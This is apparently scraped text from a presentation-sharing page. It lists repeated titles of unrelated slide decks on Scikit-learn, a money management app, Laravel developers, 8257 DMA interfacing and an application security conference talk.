VTU technical seminar 8Th Sem on Scikit-learn
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 

AOEconf17: Application Security